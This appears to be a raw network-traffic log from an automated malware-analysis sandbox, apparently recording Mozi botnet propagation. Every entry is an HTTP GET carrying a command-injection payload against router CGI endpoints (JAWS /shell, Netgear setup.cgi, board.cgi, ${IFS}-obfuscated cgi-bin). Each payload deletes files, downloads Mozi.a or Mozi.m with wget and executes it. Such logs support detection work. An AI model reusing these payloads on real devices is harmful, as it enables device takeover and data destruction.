                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 16.29.234.244:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 38.95.163.205:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 54.252.138.172:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 121.202.179.6:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 62.103.171.28:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 28.102.126.49:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 194.17.56.146:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 150.55.156.79:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 3.179.237.117:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 131.241.38.205:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 113.213.140.110:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 216.199.223.139:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 158.155.184.153:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 64.246.130.65:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 162.154.175.138:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
